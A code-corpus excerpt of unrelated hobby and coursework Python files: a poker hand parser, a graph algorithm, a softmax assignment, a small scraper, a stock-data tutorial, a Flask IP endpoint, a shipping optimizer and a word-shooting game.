def players_after(hh):
"""finds players acting after me in hand (discludes players who have already made 1st action)
Args:
hh:'HandHistory' column, string data of hands
Returns:
set: all the players acting after me
"""
start = 0
stop = 0
hero_found = False
players_before = set() # set of players before
players_after = set() # set of players after
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
if 'Hero' in elem: # set to true and skip if hero in elem
hero_found = True
continue
else:
for sub_elem in elem.split():
if 'player' in sub_elem:
player_name = sub_elem.replace('player="', '').replace('"', '')
if hero_found == False: # if hero yet to act add to players before
players_before.add(player_name)
else:
if player_name in players_before: # check to see that player hasn't already acted
break
else:
players_after.add(player_name) # if player hasn't acted add to players after
return players_after
def limpers(hh):
"""counts number of limpers prior to my first action
Args:
handhistory:'HandHistory' column, string data of hands
Returns:
int: number of players having limped
"""
count = 0
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
if 'Hero' in elem or ('type="3"' not in elem and 'type="0"' not in elem): # breaks if action arrives to me OR someone doesn't limp/fold
break
else:
if 'type="3"' in elem:
count += 1
return count
def raises_and_reraises(hh): # pretty sure this works but consider checking to make sure
"""returns 1 if there was a raise, and 1 + n for ever n reraise after
Args:
hh:'HandHistory' column, hand history from apply function above - string data of hands
Returns:
int: number of raises and reraises that occured prior to my first action
"""
bet = 0
player_name = 0
player_amount_bet = {} # store amount bet to delineate shoves from calls (all shoves are shoves but some are raises and some are calls)
for elem in hh: # getting amount blinded/antied prior to betting
if '[cards]' in elem and ('type="1"' in elem or 'type="2"' in elem): # ignores antis
for sub_string in elem.split():
if 'player' in sub_string: # get player name
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string: # get amount blinded/antied
bet = float(sub_string.replace('sum="', '').replace('"', ''))
player_amount_bet[player_name] = bet # add player name as key and bet as value to dictionary
for idx, elem in enumerate(hh): # find beginning of pre-flop action
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset): # find end of preflop action
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
count = 0 # variable to count the number of raises/reraises
for elem in subset:
if 'Hero' in elem: # ends process if action arrives to me
break
else:
if 'type="23"' in elem or 'type="7"' in elem: # finds shoves & raises
for sub_string in elem.split(): # gets amount shoved/raised & players name
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
if bet > max(player_amount_bet.values()): # finds whether bet was bigger than a call (type 7 is shove, which isn't necessarily a raise)
count += 1
if player_name in player_amount_bet: # adds player bet to amount from blinds
player_amount_bet[player_name] += bet
else:
player_amount_bet[player_name] = bet
return count
def callers(hh): # pretty sure this works but consider checking to make sure
"""number of players to have made a call - PROBABLY COULD USE ADDITIONAL CLEANUP
Args:
hh:'HandHistory' column, string data of hands
Returns:
int: number of callers, only non-0 when there has been a raise and a subsuquent call
"""
bet = 0
player_name = 0
player_amount_bet = {} # store amount bet to delineate shoves from calls (all shoves are shoves but some are raises and some are calls)
for elem in hh: # getting amount put in prior to betting
if '[cards]' in elem and ('type="1"' in elem or 'type="2"' in elem): # ignores antis
for sub_string in elem.split():
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
player_amount_bet[player_name] = bet
for idx, elem in enumerate(hh):
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
raise_happened = False # trigger for when a raise occures
count = 0
for elem in subset:
if 'Hero' in elem:
break
for sub_string in elem.split(): # gets amount shoved or raised & players name
if 'player' in sub_string:
player_name = sub_string.replace('player="', '').replace('"', '')
if 'sum' in sub_string:
bet = float(sub_string.replace('sum="', '').replace('"', ''))
if ('type="23"' in elem or 'type="7"' in elem) and raise_happened == False: # finds shoves & raises, trying to avoid edge cases here but probably some extraneous stuff
if 'type="7"' in elem:
if bet > max(player_amount_bet.values()):# checks to see if shove was a raise or call
raise_happened = True
else: # for raises
raise_happened = True
if raise_happened:
if 'type="3"' in elem:
count += 1
if 'type="7"' in elem:
if bet <= max(player_amount_bet.values()):
count += 1
if player_name not in player_amount_bet:
player_amount_bet[player_name] = bet
else:
player_amount_bet[player_name] += bet
return count
| true
|
dd131b4529eceb1fb14c02010b498f83e901062d
|
Python
|
mkozel92/algos_py
|
/graphs/connected_components.py
|
UTF-8
| 1,418
| 3.59375
| 4
|
[] |
no_license
|
from graphs.graph_interface import Graph
class ConnectedComponents(object):
"""class to compute connected components of given graph"""
def __init__(self, g: Graph):
"""
init with a graph
:param g: Graph
"""
self.g = g
self.visited = [False] * self.g.get_size()
self.vertex_group = [0] * self.g.get_size()
def dfs(self, v: int, group: int):
"""
dfs to mark components from the same group
Complexity O(E + V)
:param v: starting vertex
:param group: current group number
"""
if self.visited[v]:
return
self.visited[v] = True
self.vertex_group[v] = group
for vertex in self.g.adj(v):
self.dfs(vertex, group)
def compute(self):
"""
Assign each vertex to a connected component
"""
group = 0
for i in range(len(self.visited)):
if not self.visited[i]:
self.dfs(i, group)
group += 1
def is_connected(self, p: int, q: int) -> bool:
"""
check if two vertices are in the same component
:param p: a vertex
:param q: a vertex
:return: True of the vertices are connected
"""
assert (p < self.g.get_size())
assert (q < self.g.get_size())
return self.vertex_group[p] == self.vertex_group[q]
| true
|
00ae973ba7e29f94f79273e2b6beb956c2120ecf
|
Python
|
fucusy/cs224d-dp-for-nlp
|
/q1_softmax.py
|
UTF-8
| 3,290
| 3.515625
| 4
|
[] |
no_license
|
import numpy as np
import random
from q2_gradcheck_fuc import gradcheck_naive
def softmax(x):
"""
Compute the softmax function for each row of the input x.
It is crucial that this function is optimized for speed because
it will be used frequently in later code.
You might find numpy functions np.exp, np.sum, np.reshape,
np.max, and numpy broadcasting useful for this task. (numpy
broadcasting documentation:
http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
You should also make sure that your code works for one
dimensional inputs (treat the vector as a row), you might find
it helpful for your later problems.
You must implement the optimization in problem 1(a) of the
written assignment!
"""
return softmax_loss_grad(x)[0]
def softmax_loss_grad(x):
shape = x.shape
if len(shape) == 0:
return np.array(1), np.array(0)
elif len(shape) == 1:
n = shape[0]
new_x = x - np.min(x)
exp_x = np.exp(new_x)
result = exp_x / np.sum(exp_x)
grad = np.zeros((n, n))
i_equal_j = result * (1 - result)
for i in range(n):
for j in range(n):
if j == i:
grad[i][j] = i_equal_j[i]
else:
grad[i][j] = -1.0 * result[i] * result[j]
return result, grad
else:
result = []
grad = []
for num in x:
tmp_result, tmp_grad = softmax_loss_grad(num)
result.append(tmp_result)
grad.append(tmp_grad)
result = np.array(result)
grad = np.array(grad)
return result, grad
def test_softmax_basic():
"""
Some simple tests to get you started.
Warning: these are not exhaustive.
"""
print "Running basic tests..."
test1 = softmax(np.array([1,2]))
print test1
assert np.amax(np.fabs(test1 - np.array(
[0.26894142, 0.73105858]))) <= 1e-6
test3 = softmax(np.array([[-1001,-1002]]))
print test3
assert np.amax(np.fabs(test3 - np.array(
[0.73105858, 0.26894142]))) <= 1e-6
test2 = softmax(np.array([[1001,1002],[3,4]]))
print test2
assert np.amax(np.fabs(test2 - np.array(
[[0.26894142, 0.73105858], [0.26894142, 0.73105858]]))) <= 1e-6
print "You should verify these results!\n"
def test_softmax():
"""
Use this space to test your softmax implementation by running:
python q1_softmax.py
This function will not be called by the autograder, nor will
your tests be graded.
"""
print "Running your tests..."
### YOUR CODE HERE
### END YOUR CODE
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_gradcheck.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
print "checking softmax_loss_grad"
gradcheck_naive(softmax_loss_grad, np.array(123.456)) # scalar test
gradcheck_naive(softmax_loss_grad, np.random.randn(3,)) # 1-D test
gradcheck_naive(softmax_loss_grad, np.random.randn(4,5)) # 2-D test
if __name__ == "__main__":
test_softmax_basic()
your_sanity_checks()
| true
|
413b550ca29cc3258ee5e2a9eb7885ec8d7a523c
|
Python
|
ShaimaAnvar/python-challenge
|
/1.py
|
UTF-8
| 317
| 3.265625
| 3
|
[] |
no_license
|
n=int(input())
d={}
for i in range(n):
key,value = input().split(" ")
d[key]=value
querries = []
inp = input()
while len(inp)>0:
querries.append(inp)
inp=input()
for i in range(len(querries)):
if querries[i] in d:
print(querries[i]+"="+d[querries[i]])
else:
print("Not found")
| true
|
b045c9a45e036fe1a2ef007168a17ffc2a4a6aae
|
Python
|
MistyLeo12/small-projects
|
/web-scrapers/drink-scraper.py
|
UTF-8
| 345
| 2.796875
| 3
|
[] |
no_license
|
"""
Web Scraper for getting drinks dat to add to my random drink recepie project
"""
import requests
def scraper(url):
res = requests.get(url)
text = res.text
status_code = res.status_code
print(status_code)
return (text, status_code)
scraper('https://www.esquire.com/food-drink/drinks/g32402296/best-rum-cocktails/')
| true
|
9887ea36a28a911fcaf11a717177e37b35849ec9
|
Python
|
bozso11/playground
|
/getGoogleData.py
|
UTF-8
| 3,236
| 2.984375
| 3
|
[] |
no_license
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')
###################### Intro and Getting Stock Price Data - Python Programming for Finance p.1-2 ######################
# https://pythonprogramming.net/getting-stock-prices-python-programming-for-finance/
start = dt.datetime(2000, 1, 1)
end = dt.datetime(2016, 12, 31)
# df = web.DataReader('TSLA', "google", start, end)
# df2 = web.DataReader('MCO', "google", start, end)
# df.to_csv('TSLA.csv')
# df2.to_csv('MCO.csv')
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
df2 = pd.read_csv('mco.csv', parse_dates=True, index_col=0)
plt.figure(0)
df[['Open','Close']].plot()
# plt.show()
print(df[['High','Low']].tail())
plt.figure(1)
df2[['Open','Close']].plot()
# plt.show()
###################### Basic stock data Manipulation - Python Programming for Finance p.3 ######################
# https://pythonprogramming.net/stock-data-manipulation-python-programming-for-finance/
plt.figure(3)
figTitle = 'Moving average and Volume'
plt.title(figTitle)
windowSize = 100
df['100ma'] = df['Close'].rolling(window=windowSize, min_periods=0).mean()
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1,sharex=ax1)
ax1.plot(df.index, df['Close'])
ax1.plot(df.index, df['100ma'])
ax2.bar(df.index, df['Volume'])
###################### More stock manipulations - Python Programming for Finance p.4 ######################
# https://pythonprogramming.net/more-stock-data-manipulation-python-programming-for-finance/
figTitle = 'Resampled (decreased frequency) to 10 days'
plt.figure(4)
plt.title(figTitle)
df_ohlc = df['Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
ax1.xaxis_date()
candlestick_ohlc(ax1, df_ohlc.values, width=5, colorup='g')
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
# plt.show()
###################### Automating getting the S&P 500 list - Python Programming for Finance p.5 ######################
# https://pythonprogramming.net/sp500-company-list-python-programming-for-finance/
import bs4 as bs
import pickle
import requests
def save_sp500_tickers():
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'}
resp = requests.get('http://en.wikipedia.org/wiki/List_of_S%26P_500_companies',
headers=headers)
soup = bs.BeautifulSoup(resp.text, 'lxml')
table = soup.find('table', {'class': 'wikitable sortable'})
tickers = []
for row in table.findAll('tr')[1:]:
ticker = row.findAll('td')[0].text
tickers.append(ticker)
with open("sp500tickers.pickle", "wb") as f:
pickle.dump(tickers, f)
return tickers
# sp500 = save_sp500_tickers()
exit(1)
| true
|
5d5f0c9feba8b9f528e899bbba827500e9a1ae53
|
Python
|
swetasuman94/Machine-Learning
|
/Neural_network_model_on_Banknote_Authentication/ScikitLearnLab_part2.py
|
UTF-8
| 2,491
| 3.109375
| 3
|
[] |
no_license
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas.plotting import scatter_matrix
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report,confusion_matrix
class NeuralNet:
def __init__(self, url):
names = ['variance', 'skewness', 'curtosis', 'entropy', 'class']
self.df = pd.read_csv(url, header=None, names=names)
def plotGraph(self):
self.df.iloc[:, 0:4].hist()
correlations = self.df.iloc[:, 0:4].corr()
# plot correlation matrix
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(correlations, vmin=-1, vmax=1)
fig.colorbar(cax)
ticks = np.arange(0, 4, 1)
ax.set_xticks(ticks)
ax.set_yticks(ticks)
ax.set_xticklabels(self.df.iloc[:, 0:4].columns)
ax.set_yticklabels(self.df.iloc[:, 0:4].columns)
plt.title("Correlation Matrix \n")
plt.show()
#create a scatterplot
scatter_matrix(self.df.iloc[:, 0:4])
plt.show()
def preProcess(self):
nrows, ncols = self.df.shape[0], self.df.shape[1]
X = self.df.iloc[:, 0:(ncols - 1)].values.reshape(nrows, ncols - 1)
Y = self.df.iloc[:, ncols - 1].values
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=np.random)
return X_train, X_test, Y_train, Y_test
# Below is the training function
def train(self, X_train, Y_train):
model = MLPClassifier(hidden_layer_sizes=(7, 7), alpha=0.0003, max_iter=500)
model.fit(X_train, Y_train)
return model
# predict on test dataset
def predict(self, model, X_test, Y_test):
predictions = model.predict(X_test)
print("Intercepts for neurons :", model.intercepts_)
print("Weights for neurons :", model.coefs_)
print("Confusion Matrix :")
print(confusion_matrix(Y_test, predictions))
print("Classification Report :")
print(classification_report(Y_test, predictions))
if __name__ == "__main__":
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/00267/data_banknote_authentication.txt"
neural_network = NeuralNet(url)
neural_network.plotGraph()
X_train, X_test, Y_train, Y_test = neural_network.preProcess();
model = neural_network.train(X_train, Y_train)
neural_network.predict(model, X_test, Y_test)
| true
|
8ad7d1ea5b6dc0d83ab423ad0057be2d44e660f2
|
Python
|
mik-laj/docker-swarm-gcp
|
/app.py
|
UTF-8
| 552
| 2.546875
| 3
|
[] |
no_license
|
from flask import Flask
from flask import jsonify
from flask import request
import os
import socket
app = Flask(__name__)
@app.route("/ip", methods=["GET"])
def get_my_ip():
resp = {}
resp['ip'] = request.remote_addr
if request.environ.get('HTTP_X_FORWARDED_FOR') is not None:
resp['for'] = request.environ['HTTP_X_FORWARDED_FOR']
return jsonify(resp), 200
@app.route("/")
def hello():
html = "<h1>Hello, Awesome Awesome Some World! </h1>"
return html
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
| true
|
2bfb908d6e75af6dc620d084f5998fb3b00fbcca
|
Python
|
pawdon/software_engineering
|
/optimizer_module/greedy_optimizer_file.py
|
UTF-8
| 8,787
| 2.921875
| 3
|
[] |
no_license
|
from .abstract_optimizer_file import IOptimizer
from .shipments_manager_file import ShipmentsManager, Shipment, PlacedContainer, CornerPosition
from containers_module.containers_manager_file import ContainersManager
class GreedyOptimizer(IOptimizer):
"""
A greedy optimize class.
"""
def __init__(self):
"""
Constructor.
"""
super().__init__()
self.sorted_containers = None
@staticmethod
def info():
"""
Return a string with information describing the optimizer.
:return: a string with information describing the optimizer
"""
return "Greedy optimizer"
@staticmethod
def prioritize_containers(c):
"""
A function defining how to sort containers.
:param c: a container
:return: a tuple of arguments used for comparing containers
"""
return c.timestamp, -(c.length * c.width)
def optimize_single_level(self, shipment, sorted_containers, single_level=None, if_sort_by_width=False):
"""
Place containers on a single level of a single ship in an optimal way.
:param shipment: a shipment with a ship
:param sorted_containers: a sorted list of containers
:param single_level: (int) a level number where to place containers (if None, place wherever)
:param if_sort_by_width: (bool) if True, sort empty points by width, else sort them by length
:return: None
"""
if single_level is None:
single_level = shipment.get_used_levels_nr()
for container in sorted_containers:
self.place_container(shipment, container, single_level, if_sort_by_width)
def optimize_single_shipment(self, shipment, sorted_containers,
check_urgent_containers=False,
main_timestamp=None,
if_sort_by_width=False):
"""
Place containers on a single ship in an optimal way using a greedy algorithm.
:param shipment: a shipment with a ship
:param sorted_containers: a sorted list of containers
:param check_urgent_containers: (bool) if True, check timestamps of containers
:param main_timestamp: a main timestamp
:param if_sort_by_width: (bool) if True, sort empty points by width, else sort them by length
:return: a shipment with containers
"""
correct_shipment = True
containers_copy = sorted_containers.copy()
one_level_shipments = [shipment.copy(only_ship=True) for _ in range(shipment.levels_nr)]
one_level_used = [False for _ in range(shipment.levels_nr)]
for sh in one_level_shipments:
self.optimize_single_level(sh, containers_copy, single_level=0, if_sort_by_width=if_sort_by_width)
for cont in sh.get_all_containers():
containers_copy.remove(cont)
one_level_shipments.sort(key=lambda x: x.get_empty_volume(only_used_levels=True))
while True:
anything_joined = False
for i, sh in enumerate(one_level_shipments):
if not one_level_used[i]:
success = shipment.check_and_join(sh)
one_level_used[i] = success
if success:
anything_joined = True
if not anything_joined or all(one_level_used):
break
if not all(one_level_used):
for container in sorted_containers:
self.place_container(shipment, container)
placed_containers = shipment.get_all_containers()
if check_urgent_containers:
for container in sorted_containers:
if container.timestamp == main_timestamp:
break
elif container not in placed_containers:
correct_shipment = False
return correct_shipment
def check_and_add_shipment(self, shipment):
"""
Check if a given shipment can be added to the shipments manager.
If so, do it and remove used containers from the list.
:param shipment: a shipment to add
:return: True if successfully added, else False
"""
success = self.shipments_manager.check_and_add(shipment)
if success:
for container in shipment.get_all_containers():
self.sorted_containers.remove(container)
return success
def choose_and_add_shipment(self, shipments_list):
"""
Add a shipment with the smallest relative empty volume to the shipments manager.
:param shipments_list: a list of shipments
:return: True if successfully added, else False
"""
success = False
shipments_list.sort(key=lambda x: x.get_empty_volume() / x.get_full_volume())
for sh in shipments_list:
success = self.check_and_add_shipment(sh)
if success:
break
return success
def optimize(self, ships, containers, timestamp, container_height, previous_shipment):
"""
Place containers on ships in an optimal way.
:param ships: list of available ships
:param containers: a list container to place
:param timestamp: a main timestamp of containers
:param container_height: a constant height of containers
:param previous_shipment: the last (unsent) shipment returned by previous optimization
Situation when it is used:
During the latest optimization we had a big ship and we could place 100 containers
on it. We placed 75 containers and hoped we would place more so we didn't send
this shipment. Now the biggest ship can contain 50 containers. In this situation
we send the shipment based on the previous big ship.
:return: a shipment manager with list of shipment to send
"""
self.container_height = container_height
self.containers = containers
self.ships = ships
self.timestamp = timestamp
self.previous_shipment = previous_shipment
self.shipments_manager = ShipmentsManager(timestamp)
if self.report_generator is not None:
self.report_generator.log("******* OPTIMIZER LOG START *******")
self.report_generator.increase_indent()
self.sorted_containers = sorted(containers, key=self.prioritize_containers)
if self.report_generator is not None:
self.report_generator.log(f"{len(self.sorted_containers)} containers to place.")
first_shipments = [Shipment(ship=s, containers_height=container_height) for s in ships]
correct_first_shipments = [sh for sh in first_shipments if
self.optimize_single_shipment(sh, self.sorted_containers,
check_urgent_containers=True,
main_timestamp=timestamp)]
if len(correct_first_shipments) == 0:
if self.report_generator is not None:
"""
That is the described situation when to use previous_shipment.
"""
self.report_generator.log("CAN NOT SEND CONTAINERS WITH PREVIOUS TIMESTAMPS USING CURRENT SHIPS."
"PREVIOUS SHIP IS USED")
self.check_and_add_shipment(previous_shipment)
else:
self.choose_and_add_shipment(correct_first_shipments)
while len(self.sorted_containers) > 0:
self.report_generator.log(f"{len(self.sorted_containers)} containers to place.")
shipments = [Shipment(ship=s, containers_height=container_height) for s in ships]
for sh in shipments:
self.optimize_single_shipment(sh, self.sorted_containers)
self.choose_and_add_shipment(shipments)
if self.report_generator is not None:
self.report_generator.decrease_indent()
self.report_generator.log("******* OPTIMIZER LOG STOP ********\n")
return self.shipments_manager
def test():
cm = ContainersManager()
cm.add("c10,1,2,2,5", min_timestamp=0)
cm.add("c11,1,2,2,2", min_timestamp=0)
cm.add("c12,3,2,2,3", min_timestamp=0)
cm.add("c13,1,2,2,3", min_timestamp=0)
cm.add("c14,1,2,2,4", min_timestamp=0)
opt = GreedyOptimizer()
containers = cm.waiting_containers
print(containers)
s = sorted(containers, key=opt.prioritize_containers)
print(s)
if __name__ == "__main__":
test()
| true
|
cf7ea6439e36a09995fe4797151820cf5484532e
|
Python
|
edwgk/Python_class
|
/unit_1_example07_function.py
|
UTF-8
| 375
| 2.984375
| 3
|
[] |
no_license
|
def saludar(nombre,mensaje='msj por defecto'):
#mspor defecto por si falta un parametro
#msj por defecto van despues de argumentos que no tengan msj x defecto
print(mensaje,nombre)
return mensaje + '_' + nombre
cadenaCaracteres=saludar('Oscar','Mensaje prueba')
print(cadenaCaracteres)
cadenaCaracteres2=saludar('Oscar')
print(cadenaCaracteres2)
| true
|
295be3d5a4769f2eaedba8aca9a72fc0e53670b3
|
Python
|
aparrish/characterror
|
/game.py
|
UTF-8
| 26,177
| 2.59375
| 3
|
[
"MIT",
"CC-BY-3.0",
"CC-BY-4.0",
"ISC",
"Apache-2.0"
] |
permissive
|
# Copyright (c) 2011, Adam Parrish <adam@decontextualize.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import random
import string
from threading import Thread
from gamestate import GameState, GameStateManager
from lettertree import LetterTree
from tweener import Tweener
from java import lang
from ddf.minim import Minim
# janky but accurate!
initletterprob = ''.join([
'x' * 1,
'y' * 1,
'z' * 1,
'q' * 1,
'j' * 2,
'k' * 3,
'v' * 4,
'n' * 5,
'w' * 5,
'i' * 6,
'u' * 7,
'o' * 7,
'l' * 7,
'h' * 8,
'g' * 8,
'e' * 9,
'f' * 9,
't' * 12,
'r' * 13,
'm' * 13,
'd' * 13,
'a' * 13,
'b' * 14,
'p' * 19,
'c' * 20,
's' * 28])
play_offset_x = 100
fighter_offset_x = 250
play_offset_y = 100
def overdraw(things, count):
return [random.choice(things) for i in range(count)]
class TargetString(object):
def __init__(self, content, tree, x, y):
self.content = content
self.tree = tree
self.x = x
self.y = y
self.is_word = False
self.is_prefix = True # assuming our corpus contains every letter as initial
self.alpha = 255
self.textsize = 16
self.active = True
self.unique = random.randrange(100)
def subsume(self, letter):
self.content += letter
self.is_word = self.tree.is_word(self.content)
self.is_prefix = self.tree.is_prefix(self.content)
def draw(self):
if self.is_word:
fill(0, 255, 0, self.alpha)
elif self.is_prefix:
fill(255, 255, 255, self.alpha)
else:
print "%s is neither word nor prefix" % self.content
textSize(self.textsize)
textAlign(LEFT)
for i, ch in enumerate(self.content):
if len(self.content) == 1 and i == 0:
fill(255, 0, 0, self.alpha)
xoff = sin(i + self.unique + millis() / 50.0) * 1.25
yoff = cos(i + self.unique + millis() / 54.0) * 1.25
else:
xoff = sin(i + self.unique + millis() / 200.0) * 1.25
yoff = cos(i + self.unique + millis() / 205.0) * 1.25
text(ch, self.x + (i*16) + xoff, self.y + yoff)
class LetterSprite(object):
def __init__(self, let, x, y):
self.x = x
self.y = y
self.let = let
def draw(self):
fill(255)
textAlign(LEFT)
text(self.let, self.x, self.y)
class Fighter(object):
def __init__(self, letterq, maxp=0, initp=0):
self.maxp = maxp
self.pos = initp
self.letterq = letterq
(self.x, self.y) = self.getxy_for_pos(initp)
self.animation = ('<[@(#', '<[@(%', '<[@(*')
self.colors = ((0,255,255),(0,192,192),(0,192,192),(0,255,255),(255,0,0))
self.curframe = 0
def getxy_for_pos(self, pos):
return (fighter_offset_x + play_offset_x, play_offset_y+(pos*40))
def up(self):
self.pos -= 1
if self.pos < 0: self.pos = 0
(newx, newy) = self.getxy_for_pos(self.pos)
T.addTween(self, y=(newy-self.y), tweenTime=200, tweenType=T.OUT_EXPO)
T.addTween(self.letterq, y=(newy-self.y), tweenTime=250,
tweenType=T.OUT_EXPO)
def down(self):
self.pos += 1
if self.pos > self.maxp - 1: self.pos = self.maxp
(newx, newy) = self.getxy_for_pos(self.pos)
T.addTween(self, y=(newy-self.y), tweenTime=150, tweenType=T.OUT_EXPO)
T.addTween(self.letterq, y=(newy-self.letterq.y), tweenTime=225,
tweenType=T.OUT_EXPO)
def draw(self):
textAlign(LEFT)
textSize(16)
for i, (ch, col) in enumerate(zip(self.animation[self.curframe],
self.colors)):
fill(col[0],col[1],col[2])
text(ch, self.x + (i*16), self.y)
if frameCount % 5 == 0:
self.curframe += 1
if self.curframe >= len(self.animation):
self.curframe = 0
class LetterQueue(object):
def __init__(self, length, x, y):
assert type(length) is int, "length is not an integer"
self.q = list()
self.length = length
self.x = x
self.y = y
def append(self, letter):
assert type(letter) is str, "letter is not string"
assert len(letter) == 1, "letter is not string of length 1"
self.q.append(letter)
if len(self.q) > self.length:
self.q = self.q[:length]
def fill_rand_from(self, seq):
# TODO check if seq is iterable
while len(self.q) < self.length:
self.q.append(random.choice(seq))
def intersect(self, seq):
tocheck = set(seq)
newq = list()
for ch in self.q:
if ch in tocheck:
newq.append(ch)
self.q = newq
def pop(self):
return self.q.pop(0)
def letters(self):
return self.q
def shuffle(self):
random.shuffle(self.q)
def draw(self):
textAlign(LEFT)
for i, ch in enumerate(self.letters()):
fill(255 - i * 10)
textSize(16 - i)
yoff = sin(i + millis() / 300.0) * 1.8
text(ch, self.x + (i*20), self.y + yoff)
class PlayfieldState(GameState):
def __init__(self, tree, scorer, mode, slots=5):
self.tree = tree
self.letterq = LetterQueue(5, play_offset_x + fighter_offset_x + 96,
play_offset_y)
self.fighter = Fighter(self.letterq, slots-1, 0)
self.targets = [None] * slots
for i in range(slots):
self.add_target_at_slot(i)
self.populate_queue()
self.letter_sprites = list()
self.scorer = scorer
self.paused = False
self.mode = mode
self.fire_listeners = list()
def add_fire_listener(self, listener):
self.fire_listeners.append(listener)
def add_target_at_slot(self, idx):
target = TargetString(random.choice(initletterprob),
self.tree, x=-20, y=play_offset_y+(idx*40))
T.addTween(target, x=(play_offset_x+20), tweenTime=200,
tweenType=T.OUT_EXPO, tweenDelay=500)
self.targets[idx] = target
def draw(self):
textAlign(LEFT)
# draw letter slots
for i, ts in enumerate(self.targets):
ts.draw()
# draw sprites
for sp in self.letter_sprites:
sp.draw()
self.fighter.draw()
# draw letter queue
fill(255)
self.letterq.draw()
def keyPressed(self):
if self.paused: return
if key == ord('i') or (key == CODED and keyCode == UP):
self.fighter.up()
elif key == ord('k') or (key == CODED and keyCode == DOWN):
self.fighter.down()
elif key == ord('\n'):
self.detonate()
elif key == ord('z'):
self.fire()
elif key == ord('x'):
self.shuffle_queue()
elif key == 27:
self.paused = True
self.manager.add_state(PauseHelpState(callback=self.unpause))
def unpause(self):
self.paused = False
def shuffle_queue(self):
self.letterq.shuffle()
sounds['discard'].play(0)
self.scorer.attenuate_multiplier(0.5)
def detonate(self):
t = self.targets[self.fighter.pos]
if not(t.active):
return
t.active = False
if self.tree.is_word(t.content):
sounds['success'].play(0)
self.score_target(t)
T.addTween(t, alpha=-255, textsize=16, tweenTime=500,
onCompleteFunction=lambda: self.remove_target(t))
else:
sounds['failure'].play(0)
self.scorer.combobreak(t.x + len(t.content)*16, t.y)
T.addTween(t, alpha=-255, textsize=16, tweenTime=500,
onCompleteFunction=lambda: self.remove_target(t))
def fire(self):
# only fire if target able to accept
t = self.targets[self.fighter.pos]
if not(t.active):
return
sounds['shoot'].play(0)
t.active = False
popped = self.letterq.pop()
# create sprite
sprite = LetterSprite(popped, self.fighter.x, self.fighter.y)
destx = play_offset_x + (len(self.targets[self.fighter.pos].content) * 16)
desty = play_offset_y + (self.fighter.pos * 40)
# tween sprite to new position, will call letter_arrived when
# completed
destpos = self.fighter.pos
T.addTween(sprite, x=(destx-self.fighter.x), y=(desty-self.fighter.y),
tweenTime=200, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.letter_arrived(sprite, destpos))
# add to list so we can draw it
self.letter_sprites.append(sprite)
for listener in self.fire_listeners:
if hasattr(listener, 'fired'):
listener.fired(popped)
def letter_arrived(self, sprite, pos):
# called from fire(), removes sprite, adds to string, populates
# queue (also calculates score here)
self.letter_sprites.remove(sprite)
# add letter to target string, reactivate
self.targets[pos].subsume(sprite.let)
self.targets[pos].active = True
if self.tree.is_prefix(self.targets[pos].content):
self.scorer.score_letter(sprite.let, sprite.x, sprite.y)
self.cull_and_score_terminals()
self.populate_queue()
def cull_and_score_terminals(self):
compl = lambda x: self.remove_target(x)
for i, t in enumerate(self.targets):
